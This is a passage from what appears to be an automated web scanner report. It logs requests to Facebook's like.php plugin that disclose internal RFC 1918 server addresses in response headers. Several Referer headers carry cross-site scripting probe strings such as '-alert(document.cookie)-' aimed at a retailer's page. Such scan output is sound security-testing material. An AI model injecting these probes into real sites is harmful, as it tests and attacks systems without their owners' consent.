X-Cnection: close
Date: Mon, 16 May 2011 10:40:46 GMT
Content-Length: 6503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.25. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.175.132

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.175.132
X-Cnection: close
Date: Mon, 16 May 2011 10:41:52 GMT
Content-Length: 6486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.26. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.182.113

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.182.113
X-Cnection: close
Date: Mon, 16 May 2011 10:40:47 GMT
Content-Length: 6503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.27. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.176.125

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.176.125
X-Cnection: close
Date: Mon, 16 May 2011 10:40:46 GMT
Content-Length: 6503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.28. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.27.124.127

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FBlueNile&layout=standard&show_faces=false&action=like&font=arial&colorscheme=light&width=922&height=24 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.124.127
X-Cnection: close
Date: Mon, 16 May 2011 02:06:35 GMT
Content-Length: 8517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.29. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.173.113

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.173.113
X-Cnection: close
Date: Mon, 16 May 2011 10:42:02 GMT
Content-Length: 6489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.30. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.42.241.23

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.241.23
X-Cnection: close
Date: Mon, 16 May 2011 01:53:49 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.31. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.166.130

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.166.130
X-Cnection: close
Date: Mon, 16 May 2011 10:40:46 GMT
Content-Length: 6501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.32. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.33.27.112

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.27.112
X-Cnection: close
Date: Mon, 16 May 2011 10:23:40 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.33. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.169.130

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.169.130
X-Cnection: close
Date: Mon, 16 May 2011 10:42:01 GMT
Content-Length: 6487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.34. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.42.207.73

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfed3aed5%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ffeda8546c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.207.73
X-Cnection: close
Date: Mon, 16 May 2011 01:53:39 GMT
Content-Length: 8312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.35. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.173.112

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.173.112
X-Cnection: close
Date: Mon, 16 May 2011 10:41:51 GMT
Content-Length: 6486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.36. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.33.22.104

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.104
X-Cnection: close
Date: Mon, 16 May 2011 10:23:40 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.37. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.169.126

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.169.126
X-Cnection: close
Date: Mon, 16 May 2011 10:40:46 GMT
Content-Length: 6503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.38. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.190.120

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.190.120
X-Cnection: close
Date: Mon, 16 May 2011 10:41:32 GMT
Content-Length: 6499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.39. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.128.77
X-Cnection: close
Date: Mon, 16 May 2011 01:53:50 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.40. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.180.109
X-Cnection: close
Date: Mon, 16 May 2011 10:41:32 GMT
Content-Length: 6499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.41. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.175.118
X-Cnection: close
Date: Mon, 16 May 2011 10:42:01 GMT
Content-Length: 6489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.42. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.27.121
X-Cnection: close
Date: Mon, 16 May 2011 10:23:40 GMT
Content-Length: 6431

